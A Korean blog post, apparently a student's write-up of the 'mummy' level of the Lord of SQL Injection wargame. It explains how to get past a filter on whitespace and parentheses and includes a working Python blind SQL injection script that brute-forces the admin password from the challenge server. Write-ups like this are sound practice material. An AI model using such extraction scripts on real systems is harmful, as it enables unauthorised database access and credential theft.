Web Hacking/LOS

Lord of SQL Injection - mummy

2021. 10. 5. 08:00

필터링에서 괄호와 슬래시를 사용하지 못하게 막아놨다. 또한 query 에서 0x01 ~ 0x20 값이 인식되면 exit 된다. 

 

이번에는 신기하게 query 전체를 내가 구성할 수 있게 되었다. 공백을 우회하는 문제와 Blind SQL Injection 문제가 융합된 형식인 것 같다. 

 

$result[0] 이 무슨 의미인지 궁금해서 sqlsrv_fetch_array 함수의 return 값을 검색해 보았다. success 할 경우에는 나오는 데이터를 array 형식으로 return 하고, fail 한다면 NULL 값을 반환한다. query 자체를 참으로만 만들면 'Hello anonymous'라는 문자열이 출력된다. 

 

간단한 문제인 것 같다. 앞선 문제에서 column 명이 특수문자를 포함하거나 숫자로 시작할 경우에는 쿼터문자나 대괄호로 묶어주어야 한다고 했다. 일반적인 'dept'와 같은 이름의 column도 당연히 되는 것이다. 이를 이용하면 query에서 공백을 아예 없앨 수 있을 것 같다. 

 

그냥 바로 exploit 코드를 짜자.

 

import requests

requests.packages.urllib3.disable_warnings()
org_url = "https://los.rubiya.kr/chall/mummy_2e13c2a4483d845ce2d37f7c910f0f83.php"
header  = {'Cookie': 'PHPSESSID='}
session = requests.session()
    
# Brute Force
password = ''

for i in range(1, 20):
    for j in range(48, 122):
        payload = '?query="pw"from"prob_mummy"where"id"=' + "'admin'" + 'and"pw"like' + "'" + password + chr(j) + "%'"
        res     = session.get(url = org_url + payload, headers=header, verify=False)

        if "Hello anonymous" in res.text:
            password += chr(j)
            print("Current PW is [ %s ]\n" % password)
            break


# Result
print("\n\nPW --> %s\n" % password)

 

저작자표시 (새창열림)

'Web Hacking > LOS' 카테고리의 다른 글

Lord of SQL Injection - cerberus  (0) 2021.10.05
Lord of SQL Injection - yeti  (0) 2021.10.05
Lord of SQL Injection - siren  (0) 2021.10.05
Lord of SQL Injection - revenant  (0) 2021.10.05
Lord of SQL Injection - poltergeist  (0) 2021.10.03
'Web Hacking/LOS' 카테고리의 다른 글
  • Lord of SQL Injection - cerberus
  • Lord of SQL Injection - yeti
  • Lord of SQL Injection - siren
  • Lord of SQL Injection - revenant
Lucvs
Lucvs
Department of Computer Science and Engineering, 21th, Sungkyunkwan University
LucvsDepartment of Computer Science and Engineering, 21th, Sungkyunkwan University
Lucvs
Lucvs
Lucvs
전체
오늘
어제
  • 분류 전체보기
    • Lucvs
      • 훈련소 일기
      • 寿司
      • 영국 여행기
    • Pwnable
      • Techniques
      • FTZ
      • LOB
      • HackCTF
      • Dreamhack
      • pwnable.kr
      • CTF
    • Web Hacking
      • Techniques
      • Webhacking.kr
      • HackCTF
      • Dreamhack
      • LOS
    • Reversing
      • Dreamhack
    • Cryptography
      • Modern Cryptography
      • Algorithm
      • Differential Attack (차분 공격)
      • Linear Attack (선형 공격)
    • Forensic
      • Dreamhack
    • Programming
      • C
      • Python
      • Java
    • Deep Learning
    • Network
    • Project
    • Hardware
      • Raspberry Pi
      • Arduino

블로그 메뉴

  • 홈
  • 태그
  • 방명록

공지사항

인기 글

태그

  • 공군 훈련소
  • Los
  • 공군
  • Web Hacking
  • rev-basic
  • 드림핵
  • dreamhack
  • 훈련소 일기
  • 군대 일기
  • blind sql injection
  • 잉글랜드
  • 효전화
  • 웹해킹
  • Lord of SQL Injeciton
  • SQL INJECTION
  • 훈련소
  • dreamhack.io
  • 런던
  • 차분 공격
  • 차분 분석
  • 여행기
  • Differential Attack
  • 영국
  • J
  • 기훈단
  • 군대
  • Error-Based SQL Injection
  • 일기
  • lord of sql injection
  • 기본군사훈련단

최근 댓글

최근 글

hELLO · Designed By 정상우.
Lucvs
Lord of SQL Injection - mummy
상단으로

티스토리툴바

개인정보

  • 티스토리 홈
  • 포럼
  • 로그인

단축키

내 블로그

내 블로그 - 관리자 홈 전환
Q
Q
새 글 쓰기
W
W

블로그 게시글

글 수정 (권한 있는 경우)
E
E
댓글 영역으로 이동
C
C

모든 영역

이 페이지의 URL 복사
S
S
맨 위로 이동
T
T
티스토리 홈 이동
H
H
단축키 안내
Shift + /
⇧ + /

* 단축키는 한글/영문 대소문자로 이용 가능하며, 티스토리 기본 도메인에서만 동작합니다.